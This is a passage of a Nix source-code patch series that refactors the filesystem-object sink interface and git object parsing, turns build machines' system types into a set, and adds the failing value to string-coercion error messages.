restore(ParseSink & sink, Source & source, std::function hook) +void restore(FileSystemObjectSink & sink, Source & source, std::function hook) { parse(sink, "", source, [&](Path name, TreeEntry entry) { auto [accessor, from] = hook(entry.hash); diff --git a/src/libutil/git.hh b/src/libutil/git.hh index b24b25dd3..e2fe20509 100644 --- a/src/libutil/git.hh +++ b/src/libutil/git.hh @@ -60,7 +60,7 @@ using Tree = std::map; using SinkHook = void(const Path & name, TreeEntry entry); void parse( - ParseSink & sink, const Path & sinkPath, + FileSystemObjectSink & sink, const Path & sinkPath, Source & source, std::function hook, const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings); @@ -81,7 +81,7 @@ using RestoreHook = std::pair(Hash); /** * Wrapper around `parse` and `RestoreSink` */ -void restore(ParseSink & sink, Source & source, std::function hook); +void restore(FileSystemObjectSink & sink, Source & source, std::function hook); /** * Dumps a single file to a sink diff --git a/src/libutil/memory-source-accessor.hh b/src/libutil/memory-source-accessor.hh index b908f3713..b46c61e54 100644 --- a/src/libutil/memory-source-accessor.hh +++ b/src/libutil/memory-source-accessor.hh @@ -75,7 +75,7 @@ struct MemorySourceAccessor : virtual SourceAccessor /** * Write to a `MemorySourceAccessor` at the given path */ -struct MemorySink : ParseSink +struct MemorySink : FileSystemObjectSink { MemorySourceAccessor & dst; diff --git a/tests/unit/libutil/git.cc b/tests/unit/libutil/git.cc index 141a55816..6bbcd161b 100644 --- a/tests/unit/libutil/git.cc +++ b/tests/unit/libutil/git.cc @@ -119,7 +119,7 @@ const static Tree tree = { TEST_F(GitTest, tree_read) { readTest("tree.bin", [&](const auto & encoded) { StringSource in { encoded }; - NullParseSink out; + NullFileSystemObjectSink out; Tree got; parse(out, "", in, [&](auto & name, auto entry) { auto name2 = name; From 6365bbfa8120007719156b45482568aca6c74f26 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 20 Dec 2023 14:47:05 -0500 Subject: [PATCH 337/654] Improve the `FileSystemObjectSink` interface More invariants are enforced in the type, and less state needs to be stored in the main sink itself. The method here is roughly that known as "session types". Co-authored-by: Robert Hensing --- src/libstore/nar-accessor.cc | 60 +++++++---- src/libutil/archive.cc | 144 ++++++++++++++------------ src/libutil/fs-sink.cc | 72 +++++++++---- src/libutil/fs-sink.hh | 61 ++++++----- src/libutil/git.cc | 130 +++++++++++++++-------- src/libutil/git.hh | 34 +++++- src/libutil/memory-source-accessor.cc | 39 ++++--- src/libutil/memory-source-accessor.hh | 12 +-- tests/unit/libutil/git.cc | 24 +++-- 9 files changed, 357 insertions(+), 219 deletions(-) diff --git a/src/libstore/nar-accessor.cc b/src/libstore/nar-accessor.cc index 4bc68a5ae..b13e4c52c 100644 --- a/src/libstore/nar-accessor.cc +++ b/src/libstore/nar-accessor.cc @@ -19,6 +19,35 @@ struct NarMember std::map children; }; +struct NarMemberConstructor : CreateRegularFileSink +{ +private: + + NarMember & narMember; + + uint64_t & pos; + +public: + + NarMemberConstructor(NarMember & nm, uint64_t & pos) + : narMember(nm), pos(pos) + { } + + void isExecutable() override + { + narMember.stat.isExecutable = true; + } + + void preallocateContents(uint64_t size) override + { + narMember.stat.fileSize = size; + narMember.stat.narOffset = pos; + } + + void operator () (std::string_view data) override + { } +}; + struct NarAccessor : public SourceAccessor { std::optional nar; @@ -42,7 +71,7 @@ struct NarAccessor : public SourceAccessor : acc(acc), source(source) { } - void createMember(const Path & path, NarMember member) + NarMember & createMember(const Path & path, NarMember member) { size_t level = std::count(path.begin(), path.end(), '/'); while (parents.size() > level) parents.pop(); @@ -50,11 +79,14 @@ struct NarAccessor : public SourceAccessor if (parents.empty()) { acc.root = std::move(member); parents.push(&acc.root); + return acc.root; } else { if (parents.top()->stat.type != Type::tDirectory) throw Error("NAR file missing parent directory of path '%s'", path); auto result = parents.top()->children.emplace(baseNameOf(path), std::move(member)); - parents.push(&result.first->second); + auto & ref = result.first->second; + parents.push(&ref); + return ref; } } @@ -68,34 +100,18 @@ struct NarAccessor : public SourceAccessor } }); } - void createRegularFile(const Path & path) override + void createRegularFile(const Path & path, std::function func) override { - createMember(path, NarMember{ .stat = { + auto & nm = createMember(path, NarMember{ .stat = { .type = Type::tRegular, .fileSize = 0, .isExecutable = false, .narOffset = 0 } }); + NarMemberConstructor nmc { nm, pos }; + func(nmc); } - void closeRegularFile() override - { } - - void isExecutable() override - { - parents.top()->stat.isExecutable = true; - } - - void preallocateContents(uint64_t size) override - { - auto & st = parents.top()->stat; - st.fileSize = size; - st.narOffset = pos; - } - - void receiveContents(std::string_view data) override - { } - void createSymlink(const Path & path, const std::string & target) override { createMember(path, diff --git a/src/libutil/archive.cc b/src/libutil/archive.cc index 17886dd19..6062392cd 100644 --- a/src/libutil/archive.cc +++ b/src/libutil/archive.cc @@ -133,7 +133,7 @@ static SerialisationError badArchive(const std::string & s) } -static void parseContents(FileSystemObjectSink & sink, Source & source, const Path & path) +static void parseContents(CreateRegularFileSink & sink, Source & source) { uint64_t size = readLongLong(source); @@ -147,7 +147,7 @@ static void parseContents(FileSystemObjectSink & sink, Source & source, const Pa auto n = buf.size(); if ((uint64_t)n > left) n = left; source(buf.data(), n); - sink.receiveContents({buf.data(), n}); + sink({buf.data(), n}); left -= n; } @@ -171,95 +171,107 @@ static void parse(FileSystemObjectSink & sink, Source & source, const Path & pat s = readString(source); if (s != "(") throw badArchive("expected open tag"); - enum { tpUnknown, tpRegular, tpDirectory, tpSymlink } type = tpUnknown; - std::map names; - while (1) { + auto getString = [&]() { checkInterrupt(); + return readString(source); + }; - s = readString(source); + // For first iteration + s = getString(); + + while (1) { if (s == ")") { break; } else if (s == "type") { - if (type != tpUnknown) - throw badArchive("multiple type fields"); - std::string t = readString(source); + std::string t = getString(); if (t == "regular") { - type = tpRegular; - sink.createRegularFile(path); + sink.createRegularFile(path, [&](auto & crf) { + while (1) { + s = getString(); + + if (s == "contents") { + parseContents(crf, source); + } + + else if (s == "executable") { + auto s2 = getString(); + if (s2 != "") throw badArchive("executable marker has non-empty value"); + crf.isExecutable(); + } + + else break; + } + }); } else if (t == "directory") { sink.createDirectory(path); - type = tpDirectory; + + while (1) { + s = getString(); + + if (s == "entry") { + std::string name, prevName; + + s = getString(); + if (s != "(") throw badArchive("expected open tag"); + + while (1) { + s = getString(); + + if (s == ")") { + break; + } else if (s == "name") { + name = getString(); + if (name.empty() || name == "." || name == ".." || name.find('/') != std::string::npos || name.find((char) 0) != std::string::npos) + throw Error("NAR contains invalid file name '%1%'", name); + if (name <= prevName) + throw Error("NAR directory is not sorted"); + prevName = name; + if (archiveSettings.useCaseHack) { + auto i = names.find(name); + if (i != names.end()) { + debug("case collision between '%1%' and '%2%'", i->first, name); + name += caseHackSuffix; + name += std::to_string(++i->second); + } else + names[name] = 0; + } + } else if (s == "node") { + if (name.empty()) throw badArchive("entry name missing"); + parse(sink, source, path + "/" + name); + } else + throw badArchive("unknown field " + s); + } + } + + else break; + } } else if (t == "symlink") { - type = tpSymlink; + s = getString(); + + if (s != "target") + throw badArchive("expected 'target' got " + s); + + std::string target = getString(); + sink.createSymlink(path, target); + + // for the next iteration + s = getString(); } else throw badArchive("unknown file type " + t); } - else if (s == "contents" && type == tpRegular) { - parseContents(sink, source, path); - sink.closeRegularFile(); - } - - else if (s == "executable" && type == tpRegular) { - auto s = readString(source); - if (s != "") throw badArchive("executable marker has non-empty value"); - sink.isExecutable(); - } - - else if (s == "entry" && type == tpDirectory) { - std::string name, prevName; - - s = readString(source); - if (s != "(") throw badArchive("expected open tag"); - - while (1) { - checkInterrupt(); - - s = readString(source); - - if (s == ")") { - break; - } else if (s == "name") { - name = readString(source); - if (name.empty() || name == "." || name == ".." || name.find('/') != std::string::npos || name.find((char) 0) != std::string::npos) - throw Error("NAR contains invalid file name '%1%'", name); - if (name <= prevName) - throw Error("NAR directory is not sorted"); - prevName = name; - if (archiveSettings.useCaseHack) { - auto i = names.find(name); - if (i != names.end()) { - debug("case collision between '%1%' and '%2%'", i->first, name); - name += caseHackSuffix; - name += std::to_string(++i->second); - } else - names[name] = 0; - } - } else if (s == "node") { - if (name.empty()) throw badArchive("entry name missing"); - parse(sink, source, path + "/" + name); - } else - throw badArchive("unknown field " + s); - } - } - - else if (s == "target" && type == tpSymlink) { - std::string target = readString(source); - sink.createSymlink(path, target); - } - else throw badArchive("unknown field " + s); } diff --git a/src/libutil/fs-sink.cc b/src/libutil/fs-sink.cc index bf44de92d..b6f8db592 100644 --- a/src/libutil/fs-sink.cc +++ b/src/libutil/fs-sink.cc @@ -19,16 +19,12 @@ void copyRecursive( case SourceAccessor::tRegular: { - sink.createRegularFile(to); - if (stat.isExecutable) - sink.isExecutable(); - LambdaSink sink2 { - [&](auto d) { - sink.receiveContents(d); - } - }; - accessor.readFile(from, sink2, [&](uint64_t size) { - sink.preallocateContents(size); + sink.createRegularFile(to, [&](CreateRegularFileSink & crf) { + if (stat.isExecutable) + crf.isExecutable(); + accessor.readFile(from, crf, [&](uint64_t size) { + crf.preallocateContents(size); + }); }); break; } @@ -71,20 +67,24 @@ void RestoreSink::createDirectory(const Path & path) throw SysError("creating directory '%1%'", p); }; -void RestoreSink::createRegularFile(const Path & path) +struct RestoreRegularFile : CreateRegularFileSink { + AutoCloseFD fd; + + void operator () (std::string_view data) override; + void isExecutable() override; + void preallocateContents(uint64_t size) override; +}; + +void RestoreSink::createRegularFile(const Path & path, std::function func) { Path p = dstPath + path; - fd = open(p.c_str(), O_CREAT | O_EXCL | O_WRONLY | O_CLOEXEC, 0666); - if (!fd) throw SysError("creating file '%1%'", p); + RestoreRegularFile crf; + crf.fd = open(p.c_str(), O_CREAT | O_EXCL | O_WRONLY | O_CLOEXEC, 0666); + if (!crf.fd) throw SysError("creating file '%1%'", p); + func(crf); } -void RestoreSink::closeRegularFile() -{ - /* Call close explicitly to make sure the error is checked */ - fd.close(); -} - -void RestoreSink::isExecutable() +void RestoreRegularFile::isExecutable() { struct stat st; if (fstat(fd.get(), &st) == -1) @@ -93,7 +93,7 @@ void RestoreSink::isExecutable() throw SysError("fchmod"); } -void RestoreSink::preallocateContents(uint64_t len) +void RestoreRegularFile::preallocateContents(uint64_t len) { if (!restoreSinkSettings.preallocateContents) return; @@ -111,7 +111,7 @@ void RestoreSink::preallocateContents(uint64_t len) #endif } -void RestoreSink::receiveContents(std::string_view data) +void RestoreRegularFile::operator () (std::string_view data) { writeFull(fd.get(), data); } @@ -122,4 +122,32 @@ void RestoreSink::createSymlink(const Path & path, const std::string & target) nix::createSymlink(target, p); } + +void RegularFileSink::createRegularFile(const Path & path, std::function func) +{ + struct CRF : CreateRegularFileSink { + RegularFileSink & back; + CRF(RegularFileSink & back) : back(back) {} + void operator () (std::string_view data) override + { + back.sink(data); + } + void isExecutable() override {} + } crf { *this }; + func(crf); +} + + +void NullFileSystemObjectSink::createRegularFile(const Path & path, std::function func) +{ + struct : CreateRegularFileSink { + void operator () (std::string_view data) override {} + void isExecutable() override {} + } crf; + // Even though `NullFileSystemObjectSink` doesn't do anything, it's important + // that we call the function, to e.g. advance the parser using this + // sink. + func(crf); +} + } diff --git a/src/libutil/fs-sink.hh b/src/libutil/fs-sink.hh index f4c4e92f1..4dfb5b329 100644 --- a/src/libutil/fs-sink.hh +++ b/src/libutil/fs-sink.hh @@ -9,18 +9,13 @@ namespace nix { /** - * \todo Fix this API, it sucks. + * Actions on an open regular file in the process of creating it. + * + * See `FileSystemObjectSink::createRegularFile`. */ -struct FileSystemObjectSink +struct CreateRegularFileSink : Sink { - virtual void createDirectory(const Path & path) = 0; - - virtual void createRegularFile(const Path & path) = 0; - virtual void receiveContents(std::string_view data) = 0; virtual void isExecutable() = 0; - virtual void closeRegularFile() = 0; - - virtual void createSymlink(const Path & path, const std::string & target) = 0; /** * An optimization. By default, do nothing. @@ -28,8 +23,24 @@ struct FileSystemObjectSink virtual void preallocateContents(uint64_t size) { }; }; + +struct FileSystemObjectSink +{ + virtual void createDirectory(const Path & path) = 0; + + /** + * This function in general is no re-entrant. Only one file can be + * written at a time. + */ + virtual void createRegularFile( + const Path & path, + std::function) = 0; + + virtual void createSymlink(const Path & path, const std::string & target) = 0; +}; + /** - * Recusively copy file system objects from the source into the sink. + * Recursively copy file system objects from the source into the sink. */ void copyRecursive( SourceAccessor & accessor, const CanonPath & sourcePath, @@ -41,11 +52,10 @@ void copyRecursive( struct NullFileSystemObjectSink : FileSystemObjectSink { void createDirectory(const Path & path) override { } - void receiveContents(std::string_view data) override { } void createSymlink(const Path & path, const std::string & target) override { } - void createRegularFile(const Path & path) override { } - void closeRegularFile() override { } - void isExecutable() override { } + void createRegularFile( + const Path & path, + std::function) override; }; /** @@ -57,17 +67,11 @@ struct RestoreSink : FileSystemObjectSink void createDirectory(const Path & path) override; - void createRegularFile(const Path & path) override; - void receiveContents(std::string_view data) override; - void isExecutable() override; - void closeRegularFile() override; + void createRegularFile( + const Path & path, + std::function) override; void createSymlink(const Path & path, const std::string & target) override; - - void preallocateContents(uint64_t size) override; - -private: - AutoCloseFD fd; }; /** @@ -87,19 +91,14 @@ struct RegularFileSink : FileSystemObjectSink regular = false; } - void receiveContents(std::string_view data) override - { - sink(data); - } - void createSymlink(const Path & path, const std::string & target) override { regular = false; } - void createRegularFile(const Path & path) override { } - void closeRegularFile() override { } - void isExecutable() override { } + void createRegularFile( + const Path & path, + std::function) override; }; } diff --git a/src/libutil/git.cc b/src/libutil/git.cc index 058384db0..3b8c3ebac 100644 --- a/src/libutil/git.cc +++ b/src/libutil/git.cc @@ -52,24 +52,22 @@ static std::string getString(Source & source, int n) return v; } - -void parse( +void parseBlob( FileSystemObjectSink & sink, const Path & sinkPath, Source & source, - std::function hook, + bool executable, const ExperimentalFeatureSettings & xpSettings) { xpSettings.require(Xp::GitHashing); - auto type = getString(source, 5); - - if (type == "blob ") { - sink.createRegularFile(sinkPath); + sink.createRegularFile(sinkPath, [&](auto & crf) { + if (executable) + crf.isExecutable(); unsigned long long size = std::stoi(getStringUntil(source, 0)); - sink.preallocateContents(size); + crf.preallocateContents(size); unsigned long long left = size; std::string buf; @@ -79,47 +77,91 @@ void parse( checkInterrupt(); buf.resize(std::min((unsigned long long)buf.capacity(), left)); source(buf); - sink.receiveContents(buf); + crf(buf); left -= buf.size(); } + }); +} + +void parseTree( + FileSystemObjectSink & sink, + const Path & sinkPath, + Source & source, + std::function hook, + const ExperimentalFeatureSettings & xpSettings) +{ + unsigned long long size = std::stoi(getStringUntil(source, 0)); + unsigned long long left = size; + + sink.createDirectory(sinkPath); + + while (left) { + std::string perms = getStringUntil(source, ' '); + left -= perms.size(); + left -= 1; + + RawMode rawMode = std::stoi(perms, 0, 8); + auto modeOpt = decodeMode(rawMode); + if (!modeOpt) + throw Error("Unknown Git permission: %o", perms); + auto mode = std::move(*modeOpt); + + std::string name = getStringUntil(source, '\0'); + left -= name.size(); + left -= 1; + + std::string hashs = getString(source, 20); + left -= 20; + + Hash hash(HashAlgorithm::SHA1); + std::copy(hashs.begin(), hashs.end(), hash.hash); + + hook(name, TreeEntry { + .mode = mode, + .hash = hash, + }); + } +} + +ObjectType parseObjectType( + Source & source, + const ExperimentalFeatureSettings & xpSettings) +{ + xpSettings.require(Xp::GitHashing); + + auto type = getString(source, 5); + + if (type == "blob ") { + return ObjectType::Blob; } else if (type == "tree ") { - unsigned long long size = std::stoi(getStringUntil(source, 0)); - unsigned long long left = size; - - sink.createDirectory(sinkPath); - - while (left) { - std::string perms = getStringUntil(source, ' '); - left -= perms.size(); - left -= 1; - - RawMode rawMode = std::stoi(perms, 0, 8); - auto modeOpt = decodeMode(rawMode); - if (!modeOpt) - throw Error("Unknown Git permission: %o", perms); - auto mode = std::move(*modeOpt); - - std::string name = getStringUntil(source, '\0'); - left -= name.size(); - left -= 1; - - std::string hashs = getString(source, 20); - left -= 20; - - Hash hash(HashAlgorithm::SHA1); - std::copy(hashs.begin(), hashs.end(), hash.hash); - - hook(name, TreeEntry { - .mode = mode, - .hash = hash, - }); - - if (mode == Mode::Executable) - sink.isExecutable(); - } + return ObjectType::Tree; } else throw Error("input doesn't look like a Git object"); } +void parse( + FileSystemObjectSink & sink, + const Path & sinkPath, + Source & source, + bool executable, + std::function hook, + const ExperimentalFeatureSettings & xpSettings) +{ + xpSettings.require(Xp::GitHashing); + + auto type = parseObjectType(source, xpSettings); + + switch (type) { + case ObjectType::Blob: + parseBlob(sink, sinkPath, source, executable, xpSettings); + break; + case ObjectType::Tree: + parseTree(sink, sinkPath, source, hook, xpSettings); + break; + default: + assert(false); + }; +} + std::optional convertMode(SourceAccessor::Type type) { @@ -135,7 +177,7 @@ std::optional convertMode(SourceAccessor::Type type) void restore(FileSystemObjectSink & sink, Source & source, std::function hook) { - parse(sink, "", source, [&](Path name, TreeEntry entry) { + parse(sink, "", source, false, [&](Path name, TreeEntry entry) { auto [accessor, from] = hook(entry.hash); auto stat = accessor->lstat(from); auto gotOpt = convertMode(stat.type); diff --git a/src/libutil/git.hh b/src/libutil/git.hh index e2fe20509..d9eb138e1 100644 --- a/src/libutil/git.hh +++ b/src/libutil/git.hh @@ -13,12 +13,19 @@ namespace nix::git { +enum struct ObjectType { + Blob, + Tree, + //Commit, + //Tag, +}; + using RawMode = uint32_t; enum struct Mode : RawMode { Directory = 0040000, - Executable = 0100755, Regular = 0100644, + Executable = 0100755, Symlink = 0120000, }; @@ -59,9 +66,34 @@ using Tree = std::map; */ using SinkHook = void(const Path & name, TreeEntry entry); +/** + * Parse the "blob " or "tree " prefix. + * + * @throws if prefix not recognized + */ +ObjectType parseObjectType( + Source & source, + const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings); + +void parseBlob( + FileSystemObjectSink & sink, const Path & sinkPath, + Source & source, + bool executable, + const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings); + +void parseTree( + FileSystemObjectSink & sink, const Path & sinkPath, + Source & source, + std::function hook, + const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings); + +/** + * Helper putting the previous three `parse*` functions together. + */ void parse( FileSystemObjectSink & sink, const Path & sinkPath, Source & source, + bool executable, std::function hook, const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings); diff --git a/src/libutil/memory-source-accessor.cc b/src/libutil/memory-source-accessor.cc index 78a4dd298..880fa61b7 100644 --- a/src/libutil/memory-source-accessor.cc +++ b/src/libutil/memory-source-accessor.cc @@ -134,36 +134,43 @@ void MemorySink::createDirectory(const Path & path) throw Error("file '%s' is not a directory", path); }; -void MemorySink::createRegularFile(const Path & path) +struct CreateMemoryRegularFile : CreateRegularFileSink { + File::Regular & regularFile; + + CreateMemoryRegularFile(File::Regular & r) + : regularFile(r) + { } + + void operator () (std::string_view data) override; + void isExecutable() override; + void preallocateContents(uint64_t size) override; +}; + +void MemorySink::createRegularFile(const Path & path, std::function func) { auto * f = dst.open(CanonPath{path}, File { File::Regular {} }); if (!f) throw Error("file '%s' cannot be made because some parent file is not a directory", path); - if (!(r = std::get_if(&f->raw))) + if (auto * rp = std::get_if(&f->raw)) { + CreateMemoryRegularFile crf { *rp }; + func(crf); + } else throw Error("file '%s' is not a regular file", path); } -void MemorySink::closeRegularFile() +void CreateMemoryRegularFile::isExecutable() { - r = nullptr; + regularFile.executable = true; } -void MemorySink::isExecutable() +void CreateMemoryRegularFile::preallocateContents(uint64_t len) { - assert(r); - r->executable = true; + regularFile.contents.reserve(len); } -void MemorySink::preallocateContents(uint64_t len) +void CreateMemoryRegularFile::operator () (std::string_view data) { - assert(r); - r->contents.reserve(len); -} - -void MemorySink::receiveContents(std::string_view data) -{ - assert(r); - r->contents += data; + regularFile.contents += data; } void MemorySink::createSymlink(const Path & path, const std::string & target) diff --git a/src/libutil/memory-source-accessor.hh b/src/libutil/memory-source-accessor.hh index b46c61e54..7a1990d2f 100644 --- a/src/libutil/memory-source-accessor.hh +++ b/src/libutil/memory-source-accessor.hh @@ -83,17 +83,11 @@ struct MemorySink : FileSystemObjectSink void createDirectory(const Path & path) override; - void createRegularFile(const Path & path) override; - void receiveContents(std::string_view data) override; - void isExecutable() override; - void closeRegularFile() override; + void createRegularFile( + const Path & path, + std::function) override; void createSymlink(const Path & path, const std::string & target) override; - - void preallocateContents(uint64_t size) override; - -private: - MemorySourceAccessor::File::Regular * r; }; } diff --git a/tests/unit/libutil/git.cc b/tests/unit/libutil/git.cc index 6bbcd161b..76ef86bcf 100644 --- a/tests/unit/libutil/git.cc +++ b/tests/unit/libutil/git.cc @@ -66,7 +66,8 @@ TEST_F(GitTest, blob_read) { StringSource in { encoded }; StringSink out; RegularFileSink out2 { out }; - parse(out2, "", in, [](auto &, auto) {}, mockXpSettings); + ASSERT_EQ(parseObjectType(in, mockXpSettings), ObjectType::Blob); + parseBlob(out2, "", in, false, mockXpSettings); auto expected = readFile(goldenMaster("hello-world.bin")); @@ -121,7 +122,8 @@ TEST_F(GitTest, tree_read) { StringSource in { encoded }; NullFileSystemObjectSink out; Tree got; - parse(out, "", in, [&](auto & name, auto entry) { + ASSERT_EQ(parseObjectType(in, mockXpSettings), ObjectType::Tree); + parseTree(out, "", in, [&](auto & name, auto entry) { auto name2 = name; if (entry.mode == Mode::Directory) name2 += '/'; @@ -193,15 +195,21 @@ TEST_F(GitTest, both_roundrip) { MemorySink sinkFiles2 { files2 }; - std::function mkSinkHook; - mkSinkHook = [&](const Path prefix, const Hash & hash) { + std::function mkSinkHook; + mkSinkHook = [&](auto prefix, auto & hash, auto executable) { StringSource in { cas[hash] }; - parse(sinkFiles2, prefix, in, [&](const Path & name, const auto & entry) { - mkSinkHook(prefix + "/" + name, entry.hash); - }, mockXpSettings); + parse( + sinkFiles2, prefix, in, executable, + [&](const Path & name, const auto & entry) { + mkSinkHook( + prefix + "/" + name, + entry.hash, + entry.mode == Mode::Executable); + }, + mockXpSettings); }; - mkSinkHook("", root.hash); + mkSinkHook("", root.hash, false); ASSERT_EQ(files, files2); } From 739032762addcb3d88490040b388ff63b155bb16 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 23 Jan 2024 12:30:26 -0500 Subject: [PATCH 338/654] Make `Machine::systemTypes` a set not vector This is more conceptually correct (the order does not matter), and also matches what Hydra already does. (Nix and Hydra matching is needed for dedup https://github.com/NixOS/hydra/issues/1164) --- src/build-remote/build-remote.cc | 6 ++---- src/libstore/machines.cc | 2 +- src/libstore/machines.hh | 2 +- 3 files changed, 4 insertions(+), 6 deletions(-) diff --git a/src/build-remote/build-remote.cc b/src/build-remote/build-remote.cc index d69d3a0c2..b6704152a 100644 --- a/src/build-remote/build-remote.cc +++ b/src/build-remote/build-remote.cc @@ -139,9 +139,7 @@ static int main_build_remote(int argc, char * * argv) if (m.enabled && (neededSystem == "builtin" - || std::find(m.systemTypes.begin(), - m.systemTypes.end(), - neededSystem) != m.systemTypes.end()) && + || m.systemTypes.count(neededSystem) > 0) && m.allSupported(requiredFeatures) && m.mandatoryMet(requiredFeatures)) { @@ -214,7 +212,7 @@ static int main_build_remote(int argc, char * * argv) for (auto & m : machines) error - % concatStringsSep>(", ", m.systemTypes) + % concatStringsSep(", ", m.systemTypes) % m.maxJobs % concatStringsSep(", ", m.supportedFeatures) % concatStringsSep(", ", m.mandatoryFeatures); diff --git a/src/libstore/machines.cc b/src/libstore/machines.cc index 512115893..8a1da84cd 100644 --- a/src/libstore/machines.cc +++ b/src/libstore/machines.cc @@ -145,7 +145,7 @@ static Machine parseBuilderLine(const std::string & line) return { tokens[0], - isSet(1) ? tokenizeString>(tokens[1], ",") : std::vector{settings.thisSystem}, + isSet(1) ? tokenizeString>(tokens[1], ",") : std::set{settings.thisSystem}, isSet(2) ? tokens[2] : "", isSet(3) ? parseUnsignedIntField(3) : 1U, isSet(4) ? parseUnsignedIntField(4) : 1U, diff --git a/src/libstore/machines.hh b/src/libstore/machines.hh index 1adeaf1f0..d25fdf1b3 100644 --- a/src/libstore/machines.hh +++ b/src/libstore/machines.hh @@ -10,7 +10,7 @@ class Store; struct Machine { const std::string storeUri; - const std::vector systemTypes; + const std::set systemTypes; const std::string sshKey; const unsigned int maxJobs; const unsigned int speedFactor; From 870acc2892661d1d2c9f9f39c43d79cb4bbaacb0 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 23 Jan 2024 12:50:48 -0500 Subject: [PATCH 339/654] Add API docs to `Machine` methods --- src/libstore/machines.hh | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/libstore/machines.hh b/src/libstore/machines.hh index d25fdf1b3..7dd812cf0 100644 --- a/src/libstore/machines.hh +++ b/src/libstore/machines.hh @@ -19,8 +19,15 @@ struct Machine { const std::string sshPublicHostKey; bool enabled = true; + /** + * @return Whether `features` is a subset of the union of `supportedFeatures` and + * `mandatoryFeatures` + */ bool allSupported(const std::set & features) const; + /** + * @return @Whether `mandatoryFeatures` is a subset of `features` + */ bool mandatoryMet(const std::set & features) const; Machine(decltype(storeUri) storeUri, From 0aa85088dee30615adcc7a2933fb94ea8767ec35 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 23 Jan 2024 12:52:54 -0500 Subject: [PATCH 340/654] Factor out `Machine::systemSupported` There's just enough logic (the `"builtin"` special case) that makes this worthy of its own method. --- src/build-remote/build-remote.cc | 5 ++--- src/libstore/machines.cc | 5 +++++ src/libstore/machines.hh | 6 ++++++ 3 files changed, 13 insertions(+), 3 deletions(-) diff --git a/src/build-remote/build-remote.cc b/src/build-remote/build-remote.cc index b6704152a..519e03242 100644 --- a/src/build-remote/build-remote.cc +++ b/src/build-remote/build-remote.cc @@ -137,9 +137,8 @@ static int main_build_remote(int argc, char * * argv) for (auto & m : machines) { debug("considering building on remote machine '%s'", m.storeUri); - if (m.enabled - && (neededSystem == "builtin" - || m.systemTypes.count(neededSystem) > 0) && + if (m.enabled && + m.systemSupported(neededSystem) && m.allSupported(requiredFeatures) && m.mandatoryMet(requiredFeatures)) { diff --git a/src/libstore/machines.cc b/src/libstore/machines.cc index 8a1da84cd..561d8d557 100644 --- a/src/libstore/machines.cc +++ b/src/libstore/machines.cc @@ -38,6 +38,11 @@ Machine::Machine(decltype(storeUri) storeUri, sshPublicHostKey(sshPublicHostKey) {} +bool Machine::systemSupported(const std::string & system) const +{ + return system == "builtin" || (systemTypes.count(system) > 0); +} + bool Machine::allSupported(const std::set & features) const { return std::all_of(features.begin(), features.end(), diff --git a/src/libstore/machines.hh b/src/libstore/machines.hh index 7dd812cf0..1bca74c28 100644 --- a/src/libstore/machines.hh +++ b/src/libstore/machines.hh @@ -19,6 +19,12 @@ struct Machine { const std::string sshPublicHostKey; bool enabled = true; + /** + * @return Whether `system` is either `"builtin"` or in + * `systemTypes`. + */ + bool systemSupported(const std::string & system) const; + /** * @return Whether `features` is a subset of the union of `supportedFeatures` and * `mandatoryFeatures` From 83bb494a30a9e659a53eb757242fa0113aeae556 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Wed, 6 Dec 2023 12:42:53 -0800 Subject: [PATCH 341/654] Print the value in `error: cannot coerce` messages This extends the `error: cannot coerce a TYPE to a string` message to print the value that could not be coerced. This helps with debugging by making it easier to track down where the value is being produced from, especially in errors with deep or unhelpful stack traces. --- .../rl-next/print-value-in-coercion-error.md | 24 ++++++++++++++++ .../src/language/string-interpolation.md | 2 +- src/libexpr/eval.cc | 10 +++++-- src/libexpr/print-options.hh | 8 +++++- src/libexpr/print.cc | 11 +++++--- ...al-fail-bad-string-interpolation-1.err.exp | 2 +- ...al-fail-bad-string-interpolation-3.err.exp | 2 +- ...al-fail-bad-string-interpolation-4.err.exp | 2 +- tests/unit/libexpr/error_traces.cc | 28 +++++++++---------- tests/unit/libexpr/value/print.cc | 10 +++---- 10 files changed, 68 insertions(+), 31 deletions(-) create mode 100644 doc/manual/rl-next/print-value-in-coercion-error.md diff --git a/doc/manual/rl-next/print-value-in-coercion-error.md b/doc/manual/rl-next/print-value-in-coercion-error.md new file mode 100644 index 000000000..046e4e3cf --- /dev/null +++ b/doc/manual/rl-next/print-value-in-coercion-error.md @@ -0,0 +1,24 @@ +--- +synopsis: Coercion errors include the failing value +issues: #561 +prs: #9754 +--- + +The `error: cannot coerce a to a string` message now includes the value +which caused the error. + +Before: + +``` + error: cannot coerce a set to a string +``` + +After: + +``` + error: cannot coerce a set to a string: { aesSupport = «thunk»; + avx2Support = «thunk»; avx512Support = «thunk»; avxSupport = «thunk»; + canExecute = «thunk»; config = «thunk»; darwinArch = «thunk»; darwinMinVersion + = «thunk»; darwinMinVersionVariable = «thunk»; darwinPlatform = «thunk»; «84 + attributes elided»} +``` diff --git a/doc/manual/src/language/string-interpolation.md b/doc/manual/src/language/string-interpolation.md index e999b287b..6e28d2664 100644 --- a/doc/manual/src/language/string-interpolation.md +++ b/doc/manual/src/language/string-interpolation.md @@ -189,7 +189,7 @@ If neither is present, an error is thrown. > "${a}" > ``` > -> error: cannot coerce a set to a string +> error: cannot coerce a set to a string: { } > > at «string»:4:2: > diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 71e956e10..437a6b7bf 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -2255,7 +2255,9 @@ BackedStringView EvalState::coerceToString( return std::move(*maybeString); auto i = v.attrs->find(sOutPath); if (i == v.attrs->end()) { - error("cannot coerce %1% to a string", showType(v)) + error("cannot coerce %1% to a string: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) .withTrace(pos, errorCtx) .debugThrow(); } @@ -2301,7 +2303,9 @@ BackedStringView EvalState::coerceToString( } } - error("cannot coerce %1% to a string", showType(v)) + error("cannot coerce %1% to a string: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) .withTrace(pos, errorCtx) .debugThrow(); } @@ -2661,7 +2665,7 @@ void 